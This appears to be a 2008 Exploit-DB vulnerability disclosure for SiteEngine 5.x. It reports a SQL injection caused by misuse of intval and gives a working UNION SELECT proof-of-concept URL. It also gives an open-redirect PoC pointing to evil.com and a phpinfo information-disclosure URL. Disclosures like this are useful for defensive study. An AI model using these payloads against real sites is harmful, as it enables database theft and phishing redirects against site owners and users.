SiteEngine 5.x Multiple Remote Vulnerabilities



EDB-ID: 6823 CVE: N/AOSVDB-ID: N/A
Author: xy7Published: 2008-10-23Verified: Verified
Exploit Code:   DownloadVulnerable App:   N/A

Rating

(0.0)
Prev Home Next
SiteEngine 5.x Multiple Remote Vulnerabilities
Due to incorrect use of intval function, leading to the logic of inspection parameters can be bypassed, resulting in SQL injection vulnerability.
-=0x01=- SQL injection Vulnerability
vul code like this:
if ( intval( $id ) )
{
    require_once( $site_engine_root."lib/rss.php" );
$sql = "SELECT url FROM ".$tablepre."feed WHERE id={$id} AND uploader='{$SESSION['uid']}'";
POC:
http://www.test.com/announcements.php?id=1%bf%27%20and%201=2%20%20UNION%20select%201,2,user(),4,5,6,7,8,9,10,11%20/*
This vulnerability exist in board.php too……
-=0x02=- URI Redirection Vulnerability
POC:
http://www.test.com/api.php?action=logout&forward=http://evil.com
-=0x03=- Information Disclosure Vulnerability
POC:
http://www.test.com/misc.php?action=php_info
ForFun~
-=EOF=-
# milw0rm.com [2008-10-23]






Comments

No comments so far